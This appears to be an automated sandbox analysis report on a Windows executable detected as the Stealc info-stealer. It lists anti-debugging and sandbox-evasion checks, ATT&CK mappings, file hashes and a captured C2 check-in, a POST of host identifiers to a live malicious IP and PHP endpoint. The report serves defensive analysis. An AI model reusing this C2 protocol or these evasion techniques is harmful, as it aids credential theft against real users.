                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31160 GetSystemInfo,ExitProcess,0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1712532051.0000000000B22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1712532051.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1712532051.0000000000B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13306
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13252
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13255
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13274
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13266
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D345C0 VirtualProtect ?,00000004,00000100,000000000_2_00D345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49750 mov eax, dword ptr fs:[00000030h]0_2_00D49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00D478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49600
                Source: file.exe, file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D47B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00D47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D47A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6928, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phps17%VirustotalBrowse
                http://185.215.113.37/U17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpC17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/Ufile.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpCfile.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523113
                Start date and time:2024-10-01 05:32:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 81
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.948540455118834
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'820'672 bytes
                MD5:fa42e6e289aa71b35af21bb42409f81f
                SHA1:e44dcb353f84af8e6c81ebb6654945898b7fbedd
                SHA256:c17afe930719ca7861323d6e6fd2a8c59db8db0bce6ae487078d842105a830d7
                SHA512:ffbf8c9e4e7e25c388b69a6d8ad4233bd720400d9c482093999b36b642800457494796620bcf310e907b90d5d1d2a6f5036ceb248c1841dfb5fdfefc9b2dd328
                SSDEEP:24576:m0NcbFSaM1s2gtdunZBw3h88o1GUe0ZzxwSUU/qJNeKOPzcObLJtuXBpBCZjPwLV:m0GhSaMG1cCTeNURJGzbuR5iKcK
                TLSH:E585339B569A6CF7CE6148BD18EED3C998B12D85AE540CEC0D0F216D3E1B259B38CF14
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:90cececece8e8eb0

                Static PE Info

                General

                Entrypoint:0xa8d000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F43F0C1EB6Ah

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800626dfe7cd50764ddb47649f6f4a56da1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x2970000x2008c244ac03762cd8c453ba7a35c7a2cb5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                eruzhrvr0x4f50000x1970000x196600dddfa0f37f404dac01cf7fc402ee27dfFalse0.9949714991541064data7.953491932636083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                ewcbbuan0x68c0000x10000x400c5e8490afea686fc70a1a4215f35510fFalse0.736328125data5.908122127099704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x68d0000x30000x220053c5e8057b11600f4f8ee8e21e9477dfFalse0.07364430147058823DOS executable (COM)0.8146873863285452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-01T05:33:02.479402+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 1, 2024 05:33:01.512228966 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:01.517395973 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 05:33:01.517529964 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:01.517607927 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:01.522345066 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 05:33:02.238766909 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 05:33:02.238854885 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:02.240998030 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:02.245863914 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 05:33:02.479330063 CEST8049730185.215.113.37192.168.2.4
                Oct 1, 2024 05:33:02.479402065 CEST4973080192.168.2.4185.215.113.37
                Oct 1, 2024 05:33:04.726223946 CEST4973080192.168.2.4185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730185.215.113.37806928C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 1, 2024 05:33:01.517607927 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 1, 2024 05:33:02.238766909 CEST203INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 03:33:02 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 1, 2024 05:33:02.240998030 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 42 36 39 34 34 46 33 37 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a
                Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="hwid"92B6944F37144293944220------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="build"doma------DHCBGDHIEBFHCBFHDHDH--
                Oct 1, 2024 05:33:02.479330063 CEST210INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 03:33:02 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:23:32:57
                Start date:30/09/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0xd30000
                File size:1'820'672 bytes
                MD5 hash:FA42E6E289AA71B35AF21BB42409F81F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:9.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13097 d469f0 13142 d32260 13097->13142 13121 d46a64 13122 d4a9b0 4 API calls 13121->13122 13123 d46a6b 13122->13123 13124 d4a9b0 4 API calls 13123->13124 13125 d46a72 13124->13125 13126 d4a9b0 4 API calls 13125->13126 13127 d46a79 13126->13127 13128 d4a9b0 4 API calls 13127->13128 13129 d46a80 13128->13129 13294 d4a8a0 13129->13294 13131 d46b0c 13298 d46920 GetSystemTime 13131->13298 13132 d46a89 13132->13131 13134 d46ac2 OpenEventA 13132->13134 13136 d46af5 CloseHandle Sleep 13134->13136 13137 d46ad9 13134->13137 13139 d46b0a 13136->13139 13141 d46ae1 CreateEventA 13137->13141 13139->13132 13141->13131 13495 d345c0 13142->13495 13144 d32274 13145 d345c0 2 API calls 13144->13145 13146 d3228d 13145->13146 13147 d345c0 2 API calls 13146->13147 13148 d322a6 13147->13148 13149 d345c0 2 API calls 13148->13149 13150 d322bf 13149->13150 13151 d345c0 2 API calls 13150->13151 13152 d322d8 13151->13152 13153 d345c0 2 API calls 13152->13153 13154 d322f1 13153->13154 13155 d345c0 2 API calls 13154->13155 13156 d3230a 13155->13156 13157 d345c0 2 API calls 13156->13157 13158 d32323 13157->13158 13159 d345c0 2 API calls 13158->13159 13160 d3233c 13159->13160 13161 d345c0 2 API calls 13160->13161 13162 d32355 13161->13162 13163 d345c0 2 API calls 13162->13163 13164 d3236e 13163->13164 13165 d345c0 2 API calls 13164->13165 13166 d32387 13165->13166 13167 d345c0 2 API calls 13166->13167 13168 d323a0 13167->13168 13169 d345c0 2 API calls 13168->13169 13170 d323b9 13169->13170 13171 d345c0 2 API calls 13170->13171 13172 d323d2 13171->13172 13173 d345c0 2 API calls 13172->13173 13174 d323eb 13173->13174 13175 d345c0 2 API calls 13174->13175 13176 d32404 13175->13176 